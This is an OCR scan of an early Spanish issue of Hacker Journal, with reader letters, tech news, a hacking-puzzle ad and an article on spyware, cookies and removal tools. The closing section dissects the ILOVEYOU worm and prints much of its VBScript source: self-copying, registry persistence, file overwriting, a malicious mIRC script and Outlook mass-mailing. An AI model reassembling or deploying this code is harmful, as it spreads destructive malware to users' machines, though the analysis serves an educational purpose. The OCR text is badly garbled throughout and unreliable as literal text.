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4 
hacker (hák ar) 
“Persona que se divierte explorando los detalles de los 
sistemas de programación y expandiendo sus capacidades, 
a diferencia de muchos usuarios, que prefieren aprender 
solamente el mínimo necesario.” 


M 


Acabo de bajar al quiosco y he visto es' 
corta no es un tostón de revista y lo mejor de 
la, gloria, espero que sigáis así. 


Eur de revistá es genial fácil de entender, 
precio que esta de puta madre 2._. esto es 


Hay que meterle mano a, la web, ¿eh? que está bastante en pañales. Yo también estoy a 
favor de la suscripción online, que proponía Dj_Yo$olito en un mensaje anterior. 
Y yo apostaría por una revista sin CD de regalo eontrariamente a lo que parece que está esta- 
blecido como norma en las revistas de informáticak ya que éste sólo encarece el producto y al final 
siempre acaba en una caja transparente, sin ser Ptilizado nunca más ya que para llenar un CD, 
normalmente, se connierte en basura. Asimism: pongo siempre que sea posible, que los pro- 
gramas referenciados en los artículos de la revistá sean publicados en la sección de descargas de 
esta web. 


E 
Quiero aprender por que no tengo ni id: me gustaría que esta revista me ayudara y 
que la informática profesional se me hiciera fáci entender. He visto otras como arroba. (pero 
son demasiado para mi y no empiezo por el priric ¡Espero que esta revista me enseñe mucho. 
Le mando un saludo al administrador por llevar'a cábo esta revista que sin duda creo que llega- 
rá lejos (No es peloteo). Y un saludo a todog vegantes interesados por estos temas, y que 
intentan cada día aprender más. Porque Internéb' no esta formado por ese navegador o ese chat 
(MSN), sino que Internet tiene más cosas qué son muy interesantes. Espero que esta revista me 
lo enseñe, porque yo muchas veces digo mucho, pero hago poco (me cuesta, creo que a todos). 
Gracias a todos. - 


A ¿a 
tecniloco 


tf.) 


vista en su contenido pero es un poco floja, 

» ontenga 31 pag.. Otras revistas del ramo 

$ lo se! , tiene 178 página por solo 1,78_ 

el cliente lo va a agradecer con su compra, 
sistemas. 


DD 
En principio deciros que me ha, A 
en su cantidad ya que veo un poco caro que: por 
como por ejemplo computer , que no es del.migim: 
..Seguro que aceptáis críticas constructivas, 
mensualmente..os saluda un administrador" 
Halford 


a Y e 
Buen intento que ojalá. prospere. El A ampio, Pero, por favor, estas letras verdes 
me están matando los ojos. ¿Lo hacéis a propocpaRe que la gente compre la revista? Juro que 
la compro, pero cambiadlassssss.... Ho Te: jo As 
lloron_23 Y + 
E ; ] 
Enhorabuena. por la, web, la verdad am es bastante buena. Aprovecho la, ocasión para, 
pedir a alguien de Sevilla que me pueda indicar e puedo conseguir la revista. 
Hasta pronto os vuelvo a. decir que la pagina es WE buena, espero poder decir lo mismo de 


») AN 


la revista, 
Saludos. ; 

Para todos nosotros de la redacción, hacer una revista como 
Hacker Journal era un sueño y ahora:es una realidad. Recibir mensajes, 
propuestas o críticas como las que habéis enviado en poquísimos días, 
significan algo más: son la muestra de que una revista vive de sus lec- 
tores, en el lenguaje, estilo y su modo de ver las cosas. Halford, el pre- 
cio de Hacker Journal comprende algo que pocos pueden tener: la inde- 
pendencia. Y la independencia cuesta cara, sobretodo si para defender- 
la debéis descartar la publicidad y pagarte todos los costes. A Tecniloco 
podemos decir que estamos convencidos de que recorreremos mucho 
camino juntos, estamos considerámdo seriamente la sugerencia de 
Dj_Yosolito y también la idea de ren la Web los programas, o al 
menos los links mas útiles. En S no debería ser difícil encontrar 
Hacker Journal, si fuese así decídriíslo que lo controlaremos con el dis- 
tribuidor. Por lo que toca al si Jísimo lloron_23, que ha entendido 
como está de verdad la cosa, tú ra la revista y nosotros tal vez qui- 
temos un poco de verde, o tal vez no... 


ps 4 MB doehacker-journal.com 


mio Hackino  22R HARD HACKING 
e, * 
hecho por algunas; cosas simples Y otras complicadas. Hay 
experiencia y expe para los cuales el ordenador no tiene 
culo de Hacker Jou ene marcado con una contraseña 
para quién co nza), MIDHACKING (para quién ya 
G (para quié gome pan y worm). 


El mundo hacker 
curiosos, lectores. 
secretos. Cada 
para cada nive 
está dentro) y 


introducido en otros sectores del 
mercado que no eran de su 
competencia, el motor de búsqueda 
más utilizado en el Web tiene válidos 
motivos para temer. Y es con MSNBot 
que la empresa quiere atacar. Se trata 
de un software destinado a la indización 
de los sitios Web que toma la delantera 
con un verdadero buscador que los 
técnicos de Microsoft han estado 
estudiando durante un año. Antes de 
anunciar su intención de utilizar sus 
propias tecnologías, la colosal empresa 
en las búsquedas de MSN, confiaba en 
Inktomi y Overture de propiedad de 
Yahoo!. 


tro nuevo peligro acecha Google. 
Se trata de Microsoft. Juzgando la 
prepotencia con la cual se ha 


> EL TELÉFONO QUE TE LEE LOS LABIOS [7] 


ueva tecnología al servicio de la 
humanidad! Muchísimas veces digital” en 
encontramos dificultades quando tres 
queremos dar un significado concreto a dimensiones 
esta expresión super utilizada. Pero en y permite S 
este caso el resultado y la utilidad de cambiar expresión 
este aparato son evidentes. Estamos integrando informaciones 
hablando de Synface, un teléfono para para una correcta interpretación de la 
quien padece lesiones al oído, que frase pronunciada. Los primeros 
posee un software che permite prototipos llegarán dentro de dos o tres 
reproducir los movimientos de la cara en meses y su puesta a prueba será en 
un display. El ordenador crea una otoño en Reino Unido. 


Y EL PUEBLO INTERNET TEME POR SU IDENTIDAD [] 


“cara 


egún un sondeo de RSA 
Security, quien navega 4; 
en Internet tiene mucho 
miedo a que alguien 
pueda arrebatarle su/4 
identidad y que ésta 
pueda ser empleada 
de modo ilegítimo. A 
pesar de todo, más de dio ii 
40% de los usuariosY Ms a 8 Y los 
todavía no han NA / 
implementado ningún tipoN 


de protección contra los ataques 
bh que pueden amenazar su 


RES, seguridad. Sólo un 39% 
ae tiene instalado un software 
A antivirus. En conclusión: 

Mel temor de que alguien 
pueda “robar” la identidad 

no es suficiente para 

dE hacer cambiar al 42% de 


entrevistados sus 
cuando 


Y REDONDEAR EL SUELDO CON EXTRAS [E] 


odos sabemos que quien trabaja en 
Microsoft gana mucho dinero. Pero 
escuchad cómo se las ha ingeniado 
Richard Gregg para poder redondear su 
sueldo. Este trabajador aprovechando su 
posición estratégica comprava softwares 


a precios ventajosos y después los 
vendía por su cuenta. Ha ganado 17 
millones de dólares pero Microsoft lo ha 
despedido inmediatamente y ha abierto 
un procedimiento penal. Richard ¡te lo 
podías imaginar ! 
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| 

móvil...¡qué 
| pesadilla!Si lo 
[tienes todo el 
ía encendido 
y te llaman 
. Il continuamente 
y saben siempre dónde te encuentras. 
Y ¿sabías que en Gran Bretaña 
aunque lo tengas apagado en tu 
bolsillo, trasmite señales que cuando 
son decodificadas permiten saber 
dónde estás con gran exactitud? Por el 
momento las informaciones pueden 
llegar a los oídos de la policía pero 
dentro de poco podrían ser al alcance 
de vuestros jefes. Por ejemplo una 
empresa comercial tendrá la 
posibilidad de controlar a sus 
representantes o incluso los 
restaurantes podrán enviar mensajes 
a posibles clientes que se encuentran 
en sus cercanías. ¡Esperemos que 
todas estas ideas no atraviesen el 

Canal de la Manga! 


e llama G4 y es el primer canal de 

televisión por cable dedicado al 
mundo de los videojuegos. Es 
increíble la evolución a la que hemos 
asistido een el campo de. los 
videojuegos en los últimos años pero 
lo que llama la atención, es la cantidad 
de público aficionado. El canal G4 fue 
creado hace un año por la Comcast 
con un presupuesto de 150 millones 
de dólares. Este bajo presupuesto 
demuestra que la empresa no creía en 
una ¡iniciativa con éxito. Pues... 
inimaginables son los resultados ya 
que el número medio de 
telespectadores ha sido el doble de lo 
que se había planificado. Uno de los 
programas que tiene más adictos es 
Pulse que permite de aprender los 
trucos para eludir a las reglas del 
juego. 
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¡Gracias por tu mensaje! 


NOTABLE 


HOLA A TODOS 


HOLA 


HOLA 


acabo de comprar vuestra nueva pu- 
blicación. Enhorabuena, sobre todo 
por que supongo que el proceso ante- 
rior a la publicación de una revista pa- 
sa por la fase previa de consumo ex- 
cesivo de Orfidal y Aspirina, para apa- 
liar los nervios y el dolor de cabeza, 
respectivamente. Una vez superado 
eso ... tenemos Hacker Journal. 


HOLA 


recientemente he adquirido el número 
1 de su revista hacker journal ya que 
su precio y contenidos me habían ini- 
cialmente atraido, sin embargo hay un 
hecho que me ha desagradado bas-' 
tante y es el de la multitud de faltas de 
ortografía y errores gramaticales que 
he encontrado. 


HACKER JOURNAL WANT YOU ! 


¿LAS PUERTAS DEL SERVIDOR TE SON 
TAN FAMILIARES COMO LA DE LA NEVE- 
RA DE CASA?, ¿QUERÉIS COLABORAR 
CON NOSOTROS? ¡BIEN! ENVIADNOS 
UN MAIL A: 


TAY2HACK: [MeTEO la PM 
PRUEBA [VUESTRA A | 


Todos os creéis buenísimos pero, ¿lográis 
superar los niveles de protección de mo- 
do ultra rápido? Demostradlo al mundo y 
a vosotros mismos intentando superar los 
diez niveles de dificultad del ¡juego 
Try2Hack (try to hack), presente en nues- 
tra web www.hacker-jounal.com. 

El juego consiste en superar los niveles, 
insertando cada vez la password correcta 
| (se puede llegar de otros modos a las 
paginas protegidas con password). 

Para hacerlo, tal vez necesites algunos 
programas (Macromedia Flash, Softice, 
| VisualBasic). 

No podemos asegurar que todo funcione 
exactamente como se debe, 

¿Habéis entendido? 


redaccion O hacker-journal.com 


Hackerjournal 


Type the password and click to continue : 


Click here to continue 


¿Como habéis dicho? ¿Queréis 
otra pista para el nivel 2? A simple 
ojo se entiende que la página no 
esta hecha de simple Html. Podéis 
dar un vistazo al objeto incluido en 
la página y... tened listos los refle- 
jos cuando opriman envio: debéis 
ser sumamente rápidos. 


Todavía estamos elaborando es- 
tadísticas, confiables, parece ser 
que el 40% de los lectores que se 
arriesgan superan la password 
del primer nivel. De ahí en ade- 
lante, el número desciende visi- 
blemente, tal vez porque sea ne- 
cesario utilizar algo más sofistica- 
do que el bloque de notas (ésta 
podría ser una pista...). 


Level 2 


[ NEWS ] - 


A 


ELN 


ren 


EAG 1 - [ RULES] - [CHAT] - [ START! ] 


INTIMIDAD . M 


/ / Vadlifusión de la piratería de software, o la simple ansia de dinero, ha motivado a los 
] /  Wroductores de shareware a encontrar otro objeto de venta;los datos personales de 

X sus usuarios, Descubrid con nosotros qué son y cómo funcionan los programas de 
SIYWAre, que nermitelfaLcircuito publicitario spguir yreyistrar las 
costumbres de navegación dle personas a menudo ignorantes de ello. 


podercontinvar a utilizarlo libremente. 
Aún así, con un crack bajado de algún 
sitio warez, alguna modificación de los 
registros o, más simplemente, la reinsta- 
lación del programa ha sido demasiado 
fácil evitar el registro del shareware. 


>> RIP shareware... 


De frente a todo esto, programado- 
ll res y casas de software se han vis- 
Vio obligados en muchas ocasiones 
a abandonar el camino del share- 
ware para recorrer otros más pro- 
vechosos. Así muchos programas han 
evolucionado, convirtiéndose en adware 
el inglés ad - abreviación de adyertiz' 
Sement, es decir, aviso publicitario, pu- 
licidad); de hecho en el interior del 
¡Programa se visualizan bafhers 
Ipublicitarios siempre distintos y él pro- 
gramador recibe una compensación ba- 
sándose en el número de exposiciones y 
de clicks sobre los banners. Se puede 
decir que el sistema utilizado es el mis- 
mo que se emplea en los banners pre- 
sentes en las páginas web y de esta for- 
ma, el programador gana el importe 
que nadie habría pagado en caso con- 
trario. De este punto de vista Opera es 
un caso emblemático, las primeras ver- 
siones shareware, recibieron una: res- 
puesta moderada de los navegadores, 
pero a partir del diciembre del 2000, 
con el lanzamiento de la quinta versión, 
emsestarocasión “patrocinadas” en lugar 
de shareware, el número de usuarios 
creció a desmedida. Resumiendo, cuan- 


uchos de vosotros, 
por no decir casi to- 
dos, habrán intentado, 
il úl menos una vez, ins- 
talar un programa (tal vez bajado de In- 
ternet o encontrado en cualquier CD) de 
tipo shareware, es decir, utilizalales 

tuitamente durante un tiempo limi 


(normalmente 30 días) o por un Cierto 
número de veces o con un número res- 
tringido de funciones... Una yez finaliza- 
do dicho periodo aparecenlas fastidio- 
sas ventanas encargadas de recordar al 
usuario que “el.periodo a disposición ha 
ierminado”o que “es necesario adquirir 
“la licencia o registrar el programa” para 


do os conectáis en la red el adware des- 
carga los banners publicitarios que son 
visualizados a rotación en la ventana del 
programa que los ha llamado; y hasta 
aquí todo va bien. En este caso, el inter- 
cambio de información es prácticamen- 
te unidireccional: del servidor al progra- 
ma. 


2>...2l softivare empieza 
a espia 


Las empresas intentaW sacar partido 
a los medios a su alcance, a pesar de 
que esto implique una violación de 
la intimidad de los usuarios. ¿Por- 
qué limitarse a exponer banners a rota- 
ción, cuando es posible efectuar cam- 
pañas publicitarias basándose en los in- 
tereses de los usuarios? Entonces es 
aquí que se introduce una especie de 
“programa'*en el programa” que 
tiene la única función de espiar a 
las personas, recogiendo información 
sobre su conducta y enviándola a un 
servidor preciso. Nos encontramos a 
punto de identificar el motivo crucial 
que diferencia la tecnología adware de 
la spyware: en el primer caso la comu- 
nicación tiene lugar sólo en una direc- 
ción, y tenemos una exposición de ban- 
ners, mientras que en el caso desgra- 
ciado en el que la comunicación tiene 
lugar también del programa al servidor 
(y, por lo tanto, es el usuario quien 
manda datos al servidor y no viceversa) 
nos encontramos en presencia de un 
spyware. En la práctica, este tipo de 
“software espía” puede transmitir 
cualquier tipo de información so- 
bre las páginas visitadas y la per- 
manencia en ellas, los diferentes 
downloads efectuados y las accio- 
nes realizadas con el navegador 
(incluidas “eventuales adquisicio- 
nes on-line), la configuración del 
hardware, el software instalado, 


vuestro nombre tal como se encuen- 
tra en el archivo de registro de Windows 
(el que se introduce , Ad la instala- 
ción) junto, obviamente, a los datos de 
vuestra conexión (dirección IP pero tam- 
bién el proveedor y la población en 
la que os encontráis) e incluso 
vuestra dirección de correo. Los da- 
tos que un spyware puede recoger son 
innumerables y, a meñudo, 

son revendi- 

dos muy 

caros a ter- 

ceras em- 

presas que 


se interesan 


por ellos. 

¿Asusta- 
dos por to- 
do esto? ¿La 
paranoia se 
acrecienta 
TICS 
mósfera or- 
weliana de 
Gran Herma- 
no? No  te- 
máis... Después 
de todo si sabéis 
leer los síntomas 
es bastante fácil 
descubrir si hay un 
spyware en vuestro 
PC y, de la misma 
forma, no es muy difícil 
librarse de él. 


>> Los sintomas..; 


Si vuestra conexión se Hralentizado 
notablemente después He instala- 
do un nuevo programa d si archiv si- 
guen intentando abrir una conexión sin 
que el antivirus detecte lá presencia de 

probablemente un 
spyware ha sido instalado en vuestro or- 
denador. Otros síntomas pueden ser 
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“Existen aduares 
explícitos y bastante 
tolerables, y'SpyiwWares 
escondidos aliciosos” 


s, muchos de estos 
e Páginas que nunca 
habéis v lo y que incluso están a 
vuestro nombre) o extraños pop-up 
que aparecen durante la navegación, 
quizás con banners en castellan 


proveniente 


siderar que estos spyware, 
residentes en memoria, 
causan bastantes pro- 
blemas originando con- 
flictos con otros progra- 
mas y comprometen la, 
estabilidad de todo el 
sistema. Netscape Naviga- 
tor, por ejemplo, se bloquea 
presentando errores en el 
módulo Advert.dll, mientras 
que con Internet Explorer 
5.07 se producen errores al 
azar que bloquean el nave- 
” gador y la única solución es 
reiniciar el sistema (también en este 

caso la librería Advert.dll es la.causa 
del fenómeno). dj 

Existen muchísimos programas que 
contienen spyware (las listas de estos 
software esparcidas por la Red son innu- 
merables y es suficiente 0 r 

"spyware list” en un buscador pa 
contrar alguna de ellas) y entre éstos 
encontramos nombres como . 
FlashGet, Go!Zilla, 
Babylon, IPhone y casi 
programas de int cambio de ar- 
chivos más difundidos. Es necesario 
decir EE sólo algunas versiones menos 
recientes contienen spyware, mientras 
que en los últimos lanzamientos, tal vez 


os los 


Defenderse de las “galletitas” 
El método más rápido para defenderse de los cookies consiste e 
tro navegador a descargarlos; aún así esto podría comport 
mitado de los servicios que ofrece la Red ya que, por ejem 
letas” que permite al servidor identificar uniívocamente all Í 
ceso a zonas seguras protegidas como casillas postales ¡8n- -line. D orma análoga, 
configurar ell navegador de modo que solicite siempre la” autorización ántes de de- 
scargar un cookie resultaría, a causa de las continuas peticiones, decididamente frus- 
trante. Como decíamos, en muchos casos estos pequeños archivos poseen una cadu-= 
cidad desfués de la cual no son considerados válidos, sin embargo, no por ello son re- 


gistro de Windows y a la memoria, 
mientras que a la derecha tres grandes 
botones permiten visualizar los varios 
backup de los archivosisospechosos tras 
: varias “limpiézas” ema, definir 
er e | ¡on U iniciar el 
Prada : . análisis? “del sistema. Desp és de una 
1 fase de análisis afarece una 
que contiene los di 
onsiderados pel 


chosos y, a este punto, es posible remo- 

verlos todos o sólo aquellos: 

grama indique, procura 

copia de seguridad con 

backup (no os fiéis...). De la” 

sa es RefUpdate, una pequeña eo 
mienta que, 


bajo la 


presión de los usuarios, “las empresas de la 
muchas casas han decidido (al menos new economy están 


en parte) eliminarlos o ponerlos “a es- 


condidas”. dispuestas a todo por 
un poco de dinero? 


» ¡,. pero no faltan los M0 + 
la una o a, permite efectuar direc- 
remedios! tamente de la Red actualizaciones de los 
PP. archivos de definició 
mitiendo de este 
los spyware más r 


Como decídmos antes, eliminar esto 
programas espía no es tn difícil: exist 
un programa expresamente estudiad 
para esta finalidad. Ad=aware, pro 
ducto de Lavasoft, ha sido creadol 
para buscar y remover programas 
y archivos tidware, programas y ar- 


' 


mente definid en el menú Options 
los parámetros del proxy), debéis 
simplemente pulsar Connect y, una 
vez que todo ha terminado, iniciar el 


END ATA AAA 


chivos spyware, llaves de los registros de análisis con Ad-aware actualizado. y 
Ye sospechosas y cookies Hasta el año pasado existía O 

Be be a Sin lugar a dudas su em- tOut, otro programa con funcional” ;, 

pleo es intuitivoy sus resultados extraor- dades análogas a Ad-aware, pero su * 

dinarios. Una instalado, con pocos | | desarrollo se detuvo y las copias que |», 

uelicks (la versión 5.8x es algo inferior a || circulan, además de ser. lets no 

900Kb), Ad-aware está listo para ser son siquiera funcionales, tanto es así | S 


ejecutado. A la izquierda de la pantalla que el mismo Steve Gibson, autor de 
principal es posible seleccionara 

féricos físicos que se desea que el 
| grama analice, junto lógicamente al re- 
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y [7] Cookie Eater 


CAWI DO WS Co once Ciuww.realnete 


a CXAWINDOWSCookiesicomputerl www. ruotecla 


XWINDOWS1Cookiesicomputerl Ewww.seat[1].t 
CXWINDOWSCookiestcomputerl Gwww.sephora 
CXAWINDOWSACookiesicomputerl Mww.sephora 
CAWINDOWS1ACookiesicomputerl CXww. virginrac 
CAWINDOWSACookiesicomputerl Swww.yoox[1].1 
CAWINDOWS1Cookiesicomputerl HwwwzZ.islandd 
CXAWINDOWSACookiesicomputerl CMwww3.radio24 
CXAWINDOWSACookiesicomputerl Elyahoo[1].txt 
CXAWINDOWS1Cookiestcomputerl EMyahoo[2].txt 
CXAWINDOWSACookiesicomputerl GMyoox[1].txt 


» “¿Y dónde metemos 
los cookies?” 


alquier caso en la inmensa Red 
nan ido Gumentando poco a poco 
is Irampos, utilizadas por las em- 
Bresas de la new economy, de las 
¡ Jue se sirven para obtener el ari 
Nor número de datos personalés de 
lbs usuarios ignorantes... De recho 


ción de vuestro ordenador simpleménte a 
través de la apertura 
“= de una página 


e 


a 
gar las actualizaciones E. Sen = web: versión del 


e sPYeA,. navegador y del 


sistema operativo, 
resolución del 
monitor, dirección 
IP. última página 
. visitada, presencia 
pr de eventuales 
plug-in, etc. Todos 
estos datos, que a 
primera vista po- 
drían' parecer ca- 
rentes de interés, 
pe son en realidad 
pan muy importantes para to- 
das aquellas empresas que des- 


movidos de vuestro PC y una alternativa interesante al procedimiento manual (es decir, a eliminar sin- 
gularmente los cookies) puede ser el uso de algunos programas (en particular destaca Cookie Eater, 
aunque existen muchos otros más o menos evolucionados con nombres igual de elocuentes como Co- 
okie Killer, Cookie Monster...) que, por medio de agradables interfaces, 

simplifican la operación de “limpieza” individuando automáticamente 
los cookies. Finalmente es necesario recordar que, respecto a Explorer, 
navegadores como Opera y, sobretodo, Netscape y Mozilla permiten 
un control mayor y una personalización mejor del nivel de protección 
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en lo referente algas cookies. 


arrollan, por ejemplo, sitios web para los 
cuales significa mucho saber que la ma- 
yoría de los usuarios utiliza Netscape en 
lugar de Explorer (ummm... al'menos de- 


jádmelo creer ;) o si ha sido instalado o 
no el plug-in Macromedia Flash. El pro- 
blema no es el tipo de información pro- 
porcionada sino en el hecho que son “sa- 
cadas” sin que el usuario sea informado. 


» Víctimas (có Aplices) 
de una publicida 
con miras ] 


Por lo que se refiere a la navegación en 


red, los navegadores proporcionan una 
protección discreta (mientras lo permitan 
los bugs), porque existen sólo determina- 
dos datos que Un navegador puede en- 
viar a un servidor y otros que puede en- 
viar el servidor al navegador. Los únicos 
archivos que un servidor web puede en- 
viar a nuestro ordenador son los conoci- 
dos “cookies”, o bien, archivos de texto 
(generalmente de pequeñas dimensiones) 
que el navegador memoriza y conserva 
en una dirección expresa (C:¡WWin- 
dows|Cookies para quien utiliza lE en su 
PC). En un cookie generalmente no 
se guardan datos sensibles y mucho 
menos el número de vuestra tarjeta 
de crédito y, es necesario subrayarlo, 
los cookies creados por un servidor no 
pueden ser leídos por otros servidores. 
Intentemos ver que contiene: 


—-Ckmeleon.sourceforge[1].txt: 
lang 

es 

kmeleon.sourceforge.net/ 

0 

1825436032 

29722983 

3017797024 

29502... 


No haremos 
hincapié en el 
contenido; sin 
embargo es 
evidente como 
este cookie 
memoriza el 
idioma pre- 
definido pa- 
ra ese sitio web; 
por lo tanto en las próximc 
visitas a la pagina, si el cookie todavía 
no ha caducado aún, el castellano será: 


el idioma predefinido. 


La situación se complica si los co- 
Okies son memorizados por un 
script contenido, por ejemplo, en 
un pop-up publicitario de una web: 
los banners visualizados en las páginas 
web del portal no los gestiona directa- 
mente el sitio del portal, si no que son 
enviados por potentes servidores de las 
compañías publicitarias y, por eso los' 
banners visualizados en páginas impa= 
res son en realidad gestionados porel 
mismo servidor publicitario (ad- server). 


á 
Adware y RefUpdate 
www. lavasoft.nu 
Que se puede saber sobre vuestra cuenta... 
www.gemal.dk/browserspy 
Un artículo del New York Times sobre la 


intimidad en la Red 
www. era 


ce/index-privacy.htm 


Es así como un cookie mado por 
una página de un cierto portal podría 
perfectamente ser leído 09 aquella de 
en el mismo 
sí reconstruir 
Web. A este 


otro si ambas se apoyaseñ 
ad-server, consiguiendo | 
orrido” en lá: 
omo la: empresas que 
conducen la visualización del banner 
pueden tener interés en utilizar las coo- 
kies: .si leyendo un cookie, un ad-ser- 
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ha visuali- 
zado el si- 
tio. de la] 
/ Lamborghini |. 
y la página 
de un fan-| 
club de Mon- 
toya, es proba- 
ble que se sien- 
ta más atraído | 


do los cookies que se acumulan en 
iche del navegador, es posible 
éguir sus desplazamientos de 
“una página web a otra, estudiar 
sus preferencias y sus costumbres 
y así, por ejemplo, mostrar sobre las 
páginas que solicita mensajes publici- 
tarios enfocados para que la campaña 
publicitaria tenga el mayor éxito posi- 


Cookie Eater - Elimina los cookies 
www.dittotech.com/Products/CookieEnter 


AnalogX CookieWall - oO los cookies 
www.analogx.com 


Cookie Monster - Elimina todos los cookies  ” 
http://90.to/ampsoft 


ble... 


de la Red, pero es posibl 
la propia intimidad. Con un" 


) po- 
y navegar con mu- 


cha más tranquilidad. 


instaléis... 


lele - www.altos.tk 


= VIRUS .. E 


Love You es un programa escrito en Visual Basic 

Script, un lenguaje próximo a Visual Basic. El virus es- 

tá contenido en un archivo llamado “Love Letter for 

you.hxt.vbs”. A simple vista esta doble extensión pue- 

de ser muy llamativa, pero al contrario, permite 

atraer la atención de las víctimas. Como configura- 
ción predefinida, Windows oculta las extensiones conocidas. Vbs 
es una extensión reconocida por Windows y ejecutable con 
Wscript.exe. El nombre del virus aparece con el nombre de “Lo- 
ve Letter for you.txt”, lo que puede inducir a pensar que se trate 
sólo de un archivo de texto clásico. Habréis comprendido que, 
en el caso de abrir este archivo, no será el bloc de notas el pro- 
grama lanzado, sino Wscript.exe quien ejecutará el virus. En pri- 
mer lugar, algunos datos del registro de sistema son modifica- 
dos permitiendo así al virus ser ejecutado al iniciar vuestro orde- 
nador; a continuación ocurre lo mismo con algunos parámetros 
de Internet Explorer, para facilitar la proliferación del troyano. 
Pero el más grave de los problemas, que explica la enorme di- 
fusión del virus, es que durante la ejecución se envía automáti- 
camente como archivo adjunto (de la misma forma como lo he- 
mos recibido) a los contactos de nuestro libro de direcciones de 
Outlook. De esta forma, sin ni siquiera saberlo, no sólo infectáis 
vuestro ordenador, sino que también contribuís a propagarlo. 
Además este virus ha sido difundido a través del IRC, es decir la 
red de chat. Descubramos juntos una parte del código de este 
virus con la finalidad de comprender mejor cómo funciona y có- 
mo el virus | Love You ha podido difundirse tan fácilmente. 


> Firma de los autores 


rem barok -loveletter (vbe) 

rem by: spider / ispyderémail.com / 
(CGRAMMERSOft Group / 

Manila, Philippines 


Do +.) 


Las dos primeras líneas del código corresponden a la firma de 
los autores del virus, firma que desde el inicio ha hecho pensar 
que el virus proviniese de las Filipinas. 


>» Difusión del virus en nuestro 
sistema 


Set dirwin = £so.GetSpecialFolder (0) 

Set dirsystem = fso. GetSpecialFolder (1) 
Set dirtemp = fso. GetSpecialFolder (2) 
Set c = fso.Getfile (Wscript.ScriptFullNa- 
me) 

c.Copy (dirsystems”"1MSKernel132.vb8 

c.Copy (dirwing “iWin32DLL.vbs) 

c.Copy (dirsystems"LOVE-LETTER-FOR- 
YOU.TXT.vbs”) 

EN] 


Gracias a esta sintaxis el virus se copia en archivos diferentes como: 


C:IWindowsiSysteml MSKernel32.vb8 
C:Windows1Systeml Win32DLL.vbs 
C:WWindows1Systeml LOVE-LETTER-FOR- 
YOU.TXT.vbs 


sub regruns() 

On Error Resume Next 

Dim Num, downread 

regcreate 

“HKEY LOCAL MACHINEYSoftwareWMicrosoftiWin 
dows1YCurrentVersionlRuniMSKernel32 

1 dirsystems"1MSKernel132.vbs 

regcreate 

"HKEY LOCAL MACHINEYSoftwareWMicrosoftWWin 
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dowsYCurrentVersionlRunServicesiWi 
n32DLL”,dirwins"IWin32DLL.vbs” 

downread="" 

downread=regget (“HKEY_CURRENT_USERASoftwa- 
reWMicrosoftlInternet 

ExplorerYDownload Directory”) 

If (downread="") then 

downread="G: Xx" 

end if 


A al 


>» Infección de los archivos con el virus 


Además, la subrutina regruns infecta la base de los registros con 
la finalidad de ejecutar a cada inicialización de nuestro PC. No- 
tamos que se realizan otras alteraciones en los registros, como la 
que permite la descarga automática del troyano con el intento de 
infectar el ordenador. 

1f (ext="vbs") or (ext="vbe") then 

Set ap= fso.OpenTextFile (f1.path,2,true) 
Ap.write vbscopy 

Ap.close 


Así el ordenador cancela los archivos que contienen la extensión 
.vbs y .vbe. 


elseif (ext="js") or (ext="js"e) or 
(ext="c8s") or (ext="wsh") or e o 
or (ext=hta") then 

set ap=fso.OpenTextFile (£1. -—— y true) 
ap.write vbscopy 

ap.close 

bname=fso.GetBaseName (f1.path) 

set cop=fso.GetFile (f1.path) 

cop.copy (folderspecs”1"Enamek”.vbs”) 
fso.DeleteFile (fipath) 


Sucede la misma cosa a los archivos con extensión -js .jse .css 
wsh .sct, y .hta, son eliminados y substituidos con archivos con 
extensión .vbs. 


elseif (ext="jpg") or (ext="jpeg"e) then 
set ap=fso.OpenTextFile (f1.path,2,true) 
ap.write vbscopy 

ap.cloge 

set cop=fso.GetFile (f1.path) 

cop.copy (f1.pathe”.vbs”) 

fso.DeleteFile (f1.path) 


Lo mismo para los archivos con extensión .¡pg y .¡peg que son 
cancelados y reemplazados por archivos con el mismo nombre 
pero con extensión .vbs. 


elseif (ext=(mp3) or (ext="mp2") then 
set mp3=fso.CreateTextFile (f£1.pathe”.vbs”) 


mp3.write vbscopy 

mp3.close 

set att=fso.GetFile (f1.path) 
att.attributes=att.attributes+2 
end if 


la misma suerte corren los archivos .mp3 y .mp2. 


if (egq<>folderspec) then 

if (s="mirc32.exe”") or (s=mlink32.exe”) 
orul(s="mira 11) 0 

(s="script.ini”) or. (8="mire. Alp) then 
set scriptini=fso.CreateTextFile (folder- 
spec£”"1script.ini”) 

scriptini.Writeline “[script]” 
scriptini.Writeline “; mIRC Script” 
scriptini.Writeline “; Please dont edit 
tbis script” ...miRC will corrupt; 

if mIRC will” 

scriptini.Writeline ” corrupt...WINDOWS 
will affect and will not run 

correctly. thanks” 

scriptini.Writeline “;” 


119,31 
ML 


¡AUABO | 
- hi! 


Jun 
3 
d0n00N 


UTRUS .. BH 


DESTRIPADO, LÍNEA A LÍNEA, EL VIRUS MÁS FAMOSO 


scriptini.Writeline “¡Khaled Mardam-Bey” 
scriptini.Writeline “;http://ww.mirc.com 
scriptini.Writeline “;” 
scriptini.Writeline “;n0=on 1:JOIN:$H: (< 
scriptini.Writeline “¿n1=/if ( $nick == 
S$meld ( halle 

scriptini.Writeline “n2= /.dcc sen $nick 
“edirsystems"NLOVE-LETTER-FOR-YOU.HTM” 
scriptini.Writeline “n3= ) » 
scriptini.close 

end if 

end if 

next 

end sub 


El virus | Love You controla finalmente nuestro sistema para veri- 
ficar la existencia del programa Mirc, que permite acceder al chat 
de IRC. En este caso el virus se servirá de este programa para pro- 
pagarse a otros usuarios. 


>> Propagación del virus a través de 
Dutlook 


X=1 

regv=regedit.RegRead (“HKEY CURRENT_USERASO 
ftwarelMicrosoftiIWABA“£a) 

1£ (resve) then 

regvl 

end if 

if (int(a.AddressEntries.Count)>int(regv)) 

then 

for ctrentries=1 to a.AddressEntries.Count 
malead=a.Adressemtries (x) 

regad="" 

regad=regedit.RegRead (“HKEY_CURRENT_USERAS 
oftwarelmMicrosoftiWABA"“£malead) 

1£ (xegad="") then 


En esta parte del código del virus, podemos confirmar que el vi- 
rus llama a la aplicación Wab.exe, si ejecutáis la aplicación des- 
de el menú InicioNEjecuta podréis percataros que se trata de el li- 
bro de direcciones de Outlook. Como hemos ya indicado, el virus 
se transmite automáticamente a todos los contactos que hacen 
parte de nuestro libro de direcciones, sin que nos demos siquiera 
cuenta. 


Set male=out.Createltem (0) 

Male.Recipients.Add (malead) 

Male.Subject = “ILOVEYOU” 

Male.Body = vbcrlfs"kindly check the attached 
LOVELETTER coming from me.” 
Male.Attachments.Add (dirsystems”“NLOVE-LET- 
TER-FOR-YOU.TXT.vbs”) 

Male.Send 

Regedit.RegWrite 

